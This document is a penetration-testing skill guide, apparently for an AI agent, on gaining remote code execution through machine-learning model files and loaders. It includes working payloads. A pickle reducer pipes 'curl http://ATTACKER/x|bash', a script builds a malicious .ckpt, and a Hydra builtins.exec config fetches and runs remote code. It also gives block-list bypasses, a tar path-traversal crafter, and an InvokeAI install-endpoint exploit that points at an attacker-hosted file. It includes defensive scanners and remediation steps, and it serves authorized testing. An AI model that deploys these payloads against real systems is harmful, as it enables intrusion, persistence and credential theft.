| name | exploiting-ai-model-file-rce |
| description | Testing machine-learning model files and model-loading services for remote code execution caused by insecure deserialization (pickle/PyTorch), unsafe config instantiation (Hydra), archive path traversal, and dangerous layer types during authorized penetration tests of AI/ML pipelines. |
| domain | cybersecurity |
| subdomain | ai-security |
| tags | ["ai-security","model-deserialization","penetration-testing"] |
| version | 1.0 |
| author | xalgorix |
| license | Apache-2.0 |
Exploiting AI Model File RCE
When to Use
- During authorized assessments of ML training/inference pipelines, model registries, artifact buckets, or model hubs
- When a service downloads, loads, or "installs" models from user-controlled URLs or untrusted repositories
- When auto-resume/auto-deploy pipelines load checkpoints (
.ckpt, .pt, .pth, .bin) without provenance checks
- When assessing web UIs like InvokeAI, TorchServe, Triton, or NeMo/HuggingFace coders that accept model files
- When reviewing whether "safe" formats (
.safetensors, .nemo, repo config.json) still expose instantiation gadgets
Prerequisites
- Authorization: Written penetration testing agreement covering the ML systems and any callback infrastructure
- Python 3 with
torch, joblib, numpy, tensorflow/keras to craft and load test artifacts in a sandbox
- fickling, modelscan, picklescan: static analyzers to inspect pickle opcodes before/after crafting payloads
- A controlled callback host: HTTP listener / OOB server (e.g. interactsh) for blind execution confirmation
- Isolated VM/container: NEVER load untrusted models on your own host — payloads run during load
Critical: Techniques Most Often Missed (test these for EVERY model artifact)
Scanners that only diff weights miss code execution that fires during load, before any
inference runs. For every model file or model-loading endpoint, work the full matrix below.
# 1. Python pickle reducer (THE #1 vector). Any pickle-backed format runs
# __reduce__ on load: .pkl, .pt, .pth, .ckpt, .bin, joblib, numpy .npy/.npz.
# torch.load WITHOUT weights_only=True deserializes pickle → code exec.
class Payload:
def __reduce__(self):
import os
return (os.system, ("curl http://ATTACKER/x|bash",))
# 2. Hydra _target_ instantiation — NO pickle needed. Triggers on "safe"
# formats (.safetensors __metadata__, .nemo model_config.yaml, config.json)
# when libs feed untrusted metadata to hydra.utils.instantiate().
# _target_: builtins.exec
# _args_: ["import os; os.system('id')"]
# Block-list bypass: enum.bltns.eval, nemo.core.classes.common.os.system
# 3. Keras/TensorFlow Lambda layer — arbitrary Python in legacy .h5/HDF5 and
# .keras (safe_mode does NOT cover the old H5 format → "downgrade attack").
# Also CVE-2021-37678: yaml.unsafe_load when loading model from YAML.
# 4. Archive path traversal — most formats are .zip/.tar under the hood.
# Craft member name "../../tmp/hacked" or a SYMTYPE symlink to write/read
# arbitrary files on load (ONNX external-weights, model tars).
# 5. GGUF / GGML parser memory corruption (CVE-2024-25664..25668): malformed
# .gguf triggers heap overflow in the parser.
# 6. Service-level loaders: torch.load on user URL (InvokeAI CVE-2024-12029),
# TorchServe management API (ShellTorch), Triton --model-control path
# traversal, numpy np.load default allow_pickle.
How to CONFIRM a hit (avoid destructive payloads)
Use a benign, observable side effect — not a destructive command — to confirm execution:
- File-drop marker:
os.system("id > /tmp/pwned_$(hostname)") then read /tmp/pwned_*.
- OOB callback:
curl http://OOB-ID.oob.example/ or DNS lookup; a hit proves blind execution.
- Static pre-check:
fickling --check-safety model.pt or modelscan -p model.pt should flag
the reducer/GLOBAL+REDUCE opcodes before you ever load it.
- For Hydra: a process spawn at
from_pretrained/restore_from time, before weights load.
- Treat ANY child process, outbound connection, or unexpected file at load time as a confirmed hit.
Workflow
Step 1: Identify the Loader and Format
Determine exactly how the target ingests models and which API does the deserialization.
fickling --check-safety suspicious.pt
modelscan -p suspicious.pt
picklescan -p suspicious.pkl
Step 2: Craft a PyTorch / pickle Reducer Payload
The reducer returns a callable + args executed during unpickling.
import torch, os
class Evil:
def __reduce__(self):
return (os.system, ("id > /tmp/pwned; curl http://OOB-ID.oob.example/",))
torch.save({"model_state_dict": Evil(), "trainer_state": {"epoch": 10}}, "malicious.ckpt")
Victim-side this fires even with an error: torch.load("malicious.ckpt", weights_only=False).
A raw .pkl works the same with pickle.dump(Evil(), f).
Step 3: Craft a Hydra _target_ Payload for "Safe" Formats
When the loader passes model metadata/config to hydra.utils.instantiate(), no pickle is required.
_target_: builtins.exec
_args_:
- "import os; os.system('curl http://ATTACKER/x|bash')"
If a string block-list is present, bypass via alternative import paths
(enum.bltns.eval) or application-resolved names (nemo.core.classes.common.os.system).
Step 4: Craft Archive Traversal / Keras Lambda Variants
import tarfile
def escape(member):
member.name = "../../tmp/hacked"
return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
tf.add("harmless.txt", filter=escape)
Step 5: Exploit a Model-Loading Service (InvokeAI CVE-2024-12029)
When a service downloads+loads models from a URL, host the payload and trigger the endpoint.
import requests
requests.post(
"http://TARGET:9090/api/v2/models/install",
params={"source": "http://ATTACKER/payload.ckpt", "inplace": "true"},
json={}, timeout=5,
)
For Transformers4Rec/Merlin (CVE-2025-23298) and FaceDetection-DSFD, the same reducer is
delivered via a trojanized checkpoint or pushed as a serialized blob to a deserializing endpoint.
Step 6: Confirm and Assess Blast Radius
Key Concepts
| Concept | Description |
|---|
| Pickle Reducer | __reduce__/__setstate__ returns a callable+args executed during unpickling — the core RCE primitive |
| weights_only | torch.load(file, weights_only=True) blocks arbitrary pickle; absence (CVE-2025-32434 bypass aside) enables RCE |
| Hydra instantiate | hydra.utils.instantiate() imports+calls any dotted _target_ from untrusted config/metadata, no pickle needed |
| Lambda layer RCE | Keras Lambda layers store arbitrary Python; legacy .h5 bypasses safe_mode (downgrade attack) |
| Archive slip | Model formats are .zip/.tar; crafted member names or symlinks cause path traversal write/read on load |
| Parser memory corruption | Malformed GGUF/TFLite files trigger heap overflows in native parsers |
| Safe format ≠ safe load | .safetensors/.nemo carry metadata that can still reach an instantiation gadget |
Tools & Systems
| Tool | Purpose |
|---|
| fickling | Decompile/inspect and safety-check pickle opcodes; detect malicious GLOBAL/REDUCE |
| modelscan (Protect AI) | Scan PyTorch/TF/Keras/joblib model files for unsafe operators before loading |
| picklescan | Lightweight scanner for dangerous imports/opcodes in pickle files |
| Metasploit | invokeai_rce_cve_2024_12029, flowise_* and other model-service RCE modules |
| safetensors | Non-executable weights format; recommended remediation target |
| Isolated VM/container | Mandatory sandbox for loading any untrusted artifact (seccomp/AppArmor, no egress) |
Common Scenarios
Scenario 1: Trojanized Checkpoint in a Model Hub
A .ckpt shared on an internal hub embeds a __reduce__ gadget. An auto-resume training job
calls torch.load(..., weights_only=False) and executes the payload as root in the training container.
Scenario 2: InvokeAI URL Install RCE
InvokeAI 5.3.1–5.4.2 exposes /api/v2/models/install with scan=false default. Pointing source
at an attacker-hosted .ckpt triggers torch.load pickle deserialization and unauthenticated RCE.
Scenario 3: "Safe" Format Still Pops a Shell
A .safetensors model ships an __metadata__ block with _target_: builtins.exec. The loader feeds
metadata to hydra.utils.instantiate() during from_pretrained, executing code before weights load.
Scenario 4: ONNX/Model Tar Path Traversal
A model tar contains a member named ../../home/user/.bashrc. Extraction during model load overwrites
the file, achieving persistence/RCE on the next shell session.
Output Format
## AI Model File RCE Finding
**Vulnerability**: Remote Code Execution via Insecure Model Deserialization
**Severity**: Critical (CVSS 9.8)
**Component**: torch.load() in /api/v2/models/install (model loader service)
**CVE / Class**: CVE-2024-12029 / Insecure Deserialization (CWE-502)
### Reproduction Steps
1. Host payload.ckpt (pickle __reduce__ -> os.system) on attacker HTTP server
2. POST source=http://ATTACKER/payload.ckpt to /api/v2/models/install (no auth)
3. Service calls torch.load(); reducer executes; OOB callback received at OOB-ID.oob.example
### Evidence
| Item | Detail |
|------|--------|
| Trigger | torch.load(path) with weights_only unset |
| Confirmation | OOB HTTP callback + /tmp/pwned marker (uid=0 root) |
| Blast radius | Worker runs as root in container with AWS creds + egress |
| Static detector | fickling --check-safety flagged REDUCE -> os.system |
### Recommendation
1. Never deserialize untrusted models; prefer Safetensors/ONNX for weights
2. Use torch.load(weights_only=True) or an allow-listed unpickler
3. Enforce model provenance/signatures and malware-scan before load (scan=True)
4. Sandbox deserialization: non-root, seccomp/AppArmor, no network egress
5. Reject untrusted Hydra _target_ / Keras Lambda; validate config metadata
6. Patch loaders (InvokeAI >= 5.4.3, TorchServe, Triton, GGML) to fixed versions